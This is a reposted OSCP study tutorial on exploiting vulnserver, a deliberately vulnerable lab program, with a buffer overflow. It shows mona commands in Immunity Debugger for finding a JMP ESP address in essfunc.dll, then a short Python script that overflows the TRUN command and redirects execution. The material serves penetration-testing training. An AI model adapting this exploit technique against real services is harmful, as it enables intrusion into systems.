ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

OSCP Security Technology - Finding the Right Module

2021-06-27 20:03:56  阅读:224  来源: 互联网

标签:Right socket mona module exploit Module Finding immunity debugger


OSCP Security Technology - Finding the Right Module

Download Mona module and set immunity debugger configuration.

https://github.com/corelan/mona

image-20210627190856268

Open vulnserver and immunity debugger.

image-20210627191116030

Open mona modules, but not find what we need.

image-20210627191421288

Find the address(FFE4) and search it in the mona module.

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP

image-20210627191818299

!mona find -s "\xff\xe4" -m essfunc.dll

image-20210627192252854

Write the exploit script.

nano module.py
chmod 777 module.py
#!/usr/bin/python
import socket
import sys
 
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect=s.connect(('192.168.2.21',9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger" 
s.close()

Set immunity debugger before the exploit. Find the address and press F2 to highlight it.

image-20210627193751978

image-20210627193934587

Run the exploit script.

image-20210627194102224

Break it at essfunc.625011AF.

image-20210627194246225

标签:Right,socket,mona,module,exploit,Module,Finding,immunity,debugger
来源: https://www.cnblogs.com/keepmoving1113/p/14941882.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有